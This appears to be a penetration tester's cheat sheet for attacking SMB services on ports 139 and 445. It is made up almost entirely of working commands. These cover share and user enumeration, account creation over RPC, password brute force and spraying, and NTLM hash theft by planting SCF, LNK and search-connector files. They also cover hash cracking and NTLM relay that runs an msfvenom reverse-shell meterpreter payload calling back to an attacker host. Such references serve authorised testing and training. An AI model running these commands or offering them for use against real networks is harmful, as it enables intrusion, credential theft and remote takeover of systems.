SMB (139, 445)

Basic Commands

SMBMap

Shares & Perms

smbmap -H 10.10.10.10

Dirs

smbmap -H 10.10.10.10 -r share1

Download

smbmap -H 10.10.10.10 --download "share1\file1"

Upload

smbmap -H 10.10.10.10 --upload file1 "share1\file1"

SMBClient

Shares

smbclient -N -L //10.10.10.10

Connect

smbclient -U user //10.129.42.253/share1

Download All

smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

RPC

Connect

# NULL session
rpcclient -U -N "" 10.10.10.10

SysInfo

srvinfo

Users

enumdomusers

Groups

enumalsgroups

Domains

enumdomains

All

netshareenumall

Local Groups

enumalsgroups builtin

Privileges

enumprivs

SID

lookupnames user

User Info

queryuser RID

Pass Pol

getusrdompwinfo 1000

New User

# create user
createdomuser user1
# set new password
setuserinfo2 user1 24 'Pass123!'

New Share

netshareadd "C:\Windows" "Windows" 10 "Share1"

Change Pass

setuserinfo2 <USER> 23 'ComplexP4ssw0rd!'
# or
chgpasswd3 <USER> <OLD-PASS> <NEW-PASS>

Metasploit

Version

$ msfconsole -q
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.24
msf6 auxiliary(scanner/smb/smb_version) > run

Second Tab

Operations

NSEs

sudo nmap -sV -p 139,445 -script smb* 10.10.10.10

Mount

sudo mount -t cifs //10.10.10.10/share1 /mnt

Mount (auth)

sudo mount -t cifs -o username=<USER>,password=<PASS> //<TARGET-IP>/"<SHARE>" <PATH-TO-MOUNT>

List Dir Perms

smbcacls -N '//10.10.10.10/share1' /dir1

List Perms Recur

$ for i in $(ls); do echo $i; smbcacls -N '//10.10.10.103/share1' /dir1/$i ; done

1. Server

impacket-smbserver -smb2support share . -username test -password tes

2. Connect

net use x: \\10.10.14.4\share /USER:test test

3. Transfer

copy file1 x:\

Other

Enum (1)

/opt/enum4linux-ng/enum4linux-ng.py 172.16.10.3 -A

Enum (2)

/opt/impacket/examples/samrdump.py 172.16.10.3

Version

msf6 > useuse auxiliary/scanner/smb/smb_version

User Enum

msf6 > useuse auxiliary/scanner/smb/smb_login

Attacks

Passwords

BFA

hydra -L user.list -P password.list smb://172.16.10.3

Spray (Domain)

nxc smb 172.16.10.3 -u users.lst -p Password123! --continue-on-success

Spray (Local)

nxc smb 172.16.10.3 -u users.lst -p Password123! --continue-on-success --local-auth

Hashes

All described methods (SCF, LNL, SC) require WRITE access to a share/directory.

• If WRITE access to a share is available, NetExec modules can be used for automation.
• If WRITE access is only available within a READABLE share, the process must be done manually.

Share permissions can be configured to only allow folders to be created, not files; nxc will flag WRITE access in those cases.

For stealing the hash, the user must only browse the share, not interact with the file. Finally, the Metasploit's auxiliary/server/capture/smb module can be used instead of Responder.

SCF

If WRITE access to the Users share is available.

1. Create SCF

nxc smb <TARGET-IP> -u 'guest' -p '' -M scuffy -o NAME=README SERVER=<SMB-SERVER-IP>

2. Listen

sudo responder -I tun0

3. Clean

nxc smb <TARGET-IP> -u 'guest' -p '' -M scuffy -o NAME=README SERVER=<SMB-SERVER-IP> CLEANUP=True

The example below assumes that the share is locally mounted and WRITE access is available for the SMB/Users/WritableDir folder, but not for the Users share.

1. Create SCF

[Shell]
Command=2
IconFile=\\10.10.10.10\share\test.io
[Taskbar]
Command=ToggleDesktop

2. Listen

sudo responder -I tun0

3. Transfer

sudo cp example.scf SMB/Users/WritableDir

LNK

1. Uploiad LNK

nxc smb 172.16.10.3 -u user1 -p user1_pass -M slinky -o SERVER=10.10.10.10 NAME=README

2. Listen

sudo responder -I tun0

3. Clean

nxc smb 172.16.10.3 -u user1 -p user1_pass -M slinky -o NAME=README CLEANUP=YES

SC

Similar to LNK, but the URL needs to be escaped with \\ and by default it writes the file Documents in all writable shares.

1. Uploiad SC

nxc smb 172.16.10.3 -u user1 -p user1_pass -M drop-sc -o URL=\\\\2.2.2.2\\secret SHARE=share1 FILENAME=README

2. Listen

sudo responder -I tun0

3. Clean

nxc smb 172.16.10.3 -u user1 -p user1_pass -M drop-sc -o CLEANUP=True FILENAME=README

Once a hash is obtained it can be cracked or relayed.

Crack

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou

Relay

NTLM Relay

NTLM Relay

1. Enum

nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

2. Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=5555 -f exe > shell.exe

3. Server

sudo impacket-ntlmrelayx.py -h relay.txt -e ./shell.exe

4. Meterpreter

msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 5555
msf6 exploit(multi/handler) > exploit

5. Migrate

meterpreter > ps
meterpreter > migrate <PID>

1. Enum

nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

2. MSF

msf6 > use exploit/windows/smb/smb_relay
msf6 exploit(windows/smb/smb_relay) > set relay_targets
msf6 exploit(windows/smb/smb_relay) > set srvhost 172.16.10.3
msf6 exploit(windows/smb/smb_relay) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/smb_relay) > set LHOST 10.10.10.10
msf6 exploit(windows/smb/smb_relay) > exploit

1. Enum

nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

2. Relay

sudo impacket-ntlmrelayx.py -tf relay.txt -smb2support --no-http

Resources

Search Connectors

Exploring search connectors and library files in Windows@dtmsecurity

SCF File Attacks

SMB Share – SCF File AttacksPenetration Testing Lab